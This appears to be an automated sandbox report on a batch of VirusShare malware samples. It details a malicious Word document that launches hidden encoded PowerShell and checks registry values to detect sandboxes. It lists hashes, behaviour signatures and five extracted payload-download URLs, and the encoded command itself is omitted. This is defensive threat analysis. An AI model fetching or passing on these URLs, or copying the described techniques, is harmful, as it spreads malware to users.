Overview

Report tabs (task, platform, score):

  Overview                                      10
  Static                                        10
  PKSJ Malwa...87.exe   windows7-x64            1
  PKSJ Malwa...87.exe   windows10-2004-x64      3
  PKSJ Malwa...4d.exe   windows7-x64            8
  PKSJ Malwa...4d.exe   windows10-2004-x64      8
  PKSJ Malwa...c9.xls   windows7-x64            10
  PKSJ Malwa...c9.xls   windows10-2004-x64      10
  PKSJ Malwa...f9.doc   windows7-x64            10
  PKSJ Malwa...f9.doc   windows10-2004-x64      10
  PKSJ Malwa...30.pdf   windows7-x64            1
  PKSJ Malwa...30.pdf   windows10-2004-x64      1
  PKSJ Malwa...8d.exe   windows7-x64            1
  PKSJ Malwa...8d.exe   windows10-2004-x64      1
  PKSJ Malwa...fa.exe   windows7-x64            1
  PKSJ Malwa...fa.exe   windows10-2004-x64      3
  PKSJ Malwa...c8.doc   windows7-x64            10
  PKSJ Malwa...c8.doc   windows10-2004-x64      10
  PKSJ Malwa...03.doc   windows7-x64            1
  PKSJ Malwa...03.doc   windows10-2004-x64      1
  PKSJ Malwa...40.pdf   windows7-x64            1
  PKSJ Malwa...40.pdf   windows10-2004-x64      1
  PKSJ Malwa...4e.doc   windows7-x64            1
  PKSJ Malwa...4e.doc   windows10-2004-x64      1
  PKSJ Malwa...cd.pdf   windows7-x64            1
  PKSJ Malwa...cd.pdf   windows10-2004-x64      1
  PKSJ Malwa...7b.exe   windows7-x64            10
  PKSJ Malwa...7b.exe   windows10-2004-x64      10
  PKSJ Malwa...82.exe   windows7-x64            1
  PKSJ Malwa...82.exe   windows10-2004-x64      3
  PKSJ Malwa...6f.doc   windows7-x64            10
  PKSJ Malwa...6f.doc   windows10-2004-x64      10
  PKSJ Malwa...d2.doc   windows7-x64            1
  PKSJ Malwa...d2.doc   windows10-2004-x64      1
Analysis
- max time kernel: 100s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
- submitted: 07-10-2022 06:08
Behavioral tasks (sample, resource):
- behavioral1: PKSJ Malware/1/VirusShare_0a2d1ecedf3f79754aa2c18d62e75287.exe (win7-20220901-en)
- behavioral2: PKSJ Malware/1/VirusShare_0a2d1ecedf3f79754aa2c18d62e75287.exe (win10v2004-20220812-en)
- behavioral3: PKSJ Malware/1/VirusShare_0aee78510c46e3a200b6bc21ac1c954d.exe (win7-20220812-en)
- behavioral4: PKSJ Malware/1/VirusShare_0aee78510c46e3a200b6bc21ac1c954d.exe (win10v2004-20220812-en)
- behavioral5: PKSJ Malware/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls (win7-20220812-en)
- behavioral6: PKSJ Malware/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls (win10v2004-20220901-en)
- behavioral7: PKSJ Malware/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc (win7-20220812-en)
- behavioral8: PKSJ Malware/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc (win10v2004-20220812-en)
- behavioral9: PKSJ Malware/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf (win7-20220812-en)
- behavioral10: PKSJ Malware/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf (win10v2004-20220901-en)
- behavioral11: PKSJ Malware/2/VirusShare_01b55404de50bd1a56343b2f316ff88d.exe (win7-20220812-en)
- behavioral12: PKSJ Malware/2/VirusShare_01b55404de50bd1a56343b2f316ff88d.exe (win10v2004-20220812-en)
- behavioral13: PKSJ Malware/2/VirusShare_1ad9a67240d5775395c45b64dd6529fa.exe (win7-20220812-en)
- behavioral14: PKSJ Malware/2/VirusShare_1ad9a67240d5775395c45b64dd6529fa.exe (win10v2004-20220901-en)
- behavioral15: PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc (win7-20220812-en)
- behavioral16: PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc (win10v2004-20220812-en)
- behavioral17: PKSJ Malware/2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103.doc (win7-20220901-en)
- behavioral18: PKSJ Malware/2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103.doc (win10v2004-20220812-en)
- behavioral19: PKSJ Malware/2/VirusShare_480ef02bb062a57724e1b3e14532a140.pdf (win7-20220812-en)
- behavioral20: PKSJ Malware/2/VirusShare_480ef02bb062a57724e1b3e14532a140.pdf (win10v2004-20220901-en)
- behavioral21: PKSJ Malware/3/VirusShare_3fb34964fa7b8c6bfad8d960380ff04e.doc (win7-20220812-en)
- behavioral22: PKSJ Malware/3/VirusShare_3fb34964fa7b8c6bfad8d960380ff04e.doc (win10v2004-20220812-en)
- behavioral23: PKSJ Malware/3/VirusShare_4675e87be15585e66b0c88b833dd9ecd.pdf (win7-20220812-en)
- behavioral24: PKSJ Malware/3/VirusShare_4675e87be15585e66b0c88b833dd9ecd.pdf (win10v2004-20220812-en)
- behavioral25: PKSJ Malware/3/VirusShare_4aa5734fe9c86184f931f4ddaf2d4d7b.exe (win7-20220901-en)
- behavioral26: PKSJ Malware/3/VirusShare_4aa5734fe9c86184f931f4ddaf2d4d7b.exe (win10v2004-20220812-en)
- behavioral27: PKSJ Malware/3/VirusShare_5c8b670c503455baafbff400a446cf82.exe (win7-20220812-en)
- behavioral28: PKSJ Malware/3/VirusShare_5c8b670c503455baafbff400a446cf82.exe (win10v2004-20220812-en)
- behavioral29: PKSJ Malware/3/VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc (win7-20220901-en)
- behavioral30: PKSJ Malware/3/VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc (win10v2004-20220812-en)
- behavioral31: PKSJ Malware/4/VirusShare_4b8eb7fe75f72c1c5c1f80af9cd165d2.doc (win7-20220812-en)
- behavioral32: PKSJ Malware/4/VirusShare_4b8eb7fe75f72c1c5c1f80af9cd165d2.doc (win10v2004-20220812-en)
General
- Target: PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc
- Size: 125KB
- MD5: 2fe5b00079aec2d8369a798230313ec8
- SHA1: e233595a2ee62f6197fcc7d9088fce3505c38ec0
- SHA256: 8eb6805a0852b220695175ce81a5b139f1438dc06ea3fc1347b047702880374c
- SHA512: d9b4173274b49d7f041aea1a6866d5cc79530360668299385a10f25597b608308a5cb6502363709a7e09e43d30a1df95e1ab72fcc71852c78b51da016c2bbed7
- SSDEEP: 3072:beKgdzSrG8KyIwLx3phgC1s0rPOWfKNR/:beKUzSLnLx3X3O0r2WfKNJ
Malware Config
Extracted URLs:
- https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/
- https://www.wenkawang.com/data/bofze0s-7ji4-15/
- https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/
- http://ma.jopedu.com/img/8z8dl-3xn-655019278/
- http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1552 | 4732 | Powershell.exe |
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow | pid | process
    23 | 1552 | Powershell.exe
    26 | 1552 | Powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid | process
    4976 | WINWORD.EXE
    4976 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid | process
    1552 | Powershell.exe
    1552 | Powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 1552 | Powershell.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
    pid | process
    4976 | WINWORD.EXE
    4976 | WINWORD.EXE
- Suspicious use of SetWindowsHookEx (8 IoCs)
  Processes:
    pid | process
    4976 | WINWORD.EXE (this row is repeated 8 times)
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes:
    description | pid | process | target process
    PID 4976 wrote to memory of 3488 | 4976 | WINWORD.EXE | splwow64.exe
    PID 4976 wrote to memory of 3488 | 4976 | WINWORD.EXE | splwow64.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PKSJ Malware\2\VirusShare_2fe5b00079aec2d8369a798230313ec8.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (child of WINWORD.EXE)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -w hidden -en [encoded command omitted from the page]
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads (file, filesize)
- memory/1552-143-0x00007FFFC1770000-0x00007FFFC2231000-memory.dmp (10.8MB)
- memory/1552-142-0x00007FFFC1770000-0x00007FFFC2231000-memory.dmp (10.8MB)
- memory/1552-141-0x000002037F990000-0x000002037F9B2000-memory.dmp (136KB)
- memory/3488-139-0x0000000000000000-mapping.dmp
- memory/4976-140-0x000001D3B0980000-0x000001D3B0984000-memory.dmp (16KB)
- memory/4976-137-0x00007FFFAB600000-0x00007FFFAB610000-memory.dmp (64KB)
- memory/4976-138-0x00007FFFAB600000-0x00007FFFAB610000-memory.dmp (64KB)
- memory/4976-136-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-132-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-135-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-133-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-134-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-145-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-148-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-147-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)
- memory/4976-146-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmp (64KB)